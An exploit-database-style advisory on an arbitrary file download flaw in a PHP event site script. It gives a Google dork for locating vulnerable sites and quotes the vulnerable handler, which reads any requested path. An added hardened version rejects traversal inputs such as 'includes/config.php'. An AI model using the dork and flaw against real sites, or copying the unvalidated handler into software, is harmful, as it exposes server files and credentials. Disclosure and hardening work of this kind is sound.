/***********************************************************************************
** Exploit Title: Innovinc International Script Local File Download Vulnerability
**
** Exploit Author: Milad Hacking
**
** Vendor Homepage : https://innovinc.org/
**
** Version : 1.1
**
** Google Dork : inurl:/importantdates intext:”Innovinc International”
**
** Date: 2020-02-13
**
** Tested on: Kali Linux / Iceweasel
**
***********************************************************************************
** Demo :


***********************************************************************************
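** Vulnerable code :

<?php
// The request parameter is used as a filesystem path with no validation,
// so any file readable by the web server can be requested.
$file = $_GET['file'];
if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/pdf');
    // newFile is also taken from the request unvalidated.
    header('Content-Disposition: attachment; filename=' . $_GET['newFile']);
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    exit;
}
?>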
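
** Hardened handler : added example, not part of the original advisory or the vendor's code. It serves only .pdf files located directly in one directory and ignores the newFile parameter; DOWNLOAD_DIR, resolve_download() and the downloads/ layout are assumptions.

```php
<?php
// Added example, not the vendor's code. DOWNLOAD_DIR and resolve_download()
// are hypothetical names; the downloads directory is an assumed layout.
const DOWNLOAD_DIR = __DIR__ . '/downloads';

// Canonical path of $requested if it is a regular .pdf directly inside $baseDir, else null.
function resolve_download(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    // basename() drops every directory component, so a value such as
    // "includes/config.php" can only name a file inside $base.
    $name = basename($requested);
    if ($base === false || !preg_match('/\A[A-Za-z0-9._-]+\.pdf\z/i', $name)) {
        return null;
    }
    // realpath() resolves symlinks, so containment is re-checked afterwards.
    $prefix = $base . DIRECTORY_SEPARATOR;
    $path = realpath($prefix . $name);
    if ($path === false || !is_file($path) || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed self-check: one PDF in a temp directory, then two values that must be refused.
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dl_demo_' . getmypid();
    mkdir($dir);
    touch($dir . DIRECTORY_SEPARATOR . 'programme.pdf');
    foreach (['programme.pdf', 'includes/config.php', '../programme.pdf.php'] as $in) {
        echo $in, ' => ', resolve_download($dir, $in) === null ? 'rejected' : 'served', "\n";
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'programme.pdf');
    rmdir($dir);
    exit;
}

$req = $_GET['file'] ?? '';
$path = is_string($req) ? resolve_download(DOWNLOAD_DIR, $req) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/pdf');
// The file name comes from the validated path, never from a request parameter.
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```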

***********************************************************************************
** Special thanks to: iliya Norton – Milad Hacking – N3TC4T – Nazila Blackhat – Babak Kh4t4R
Mahdi CocAin – Mohammad Samiyi <3
***********************************************************************************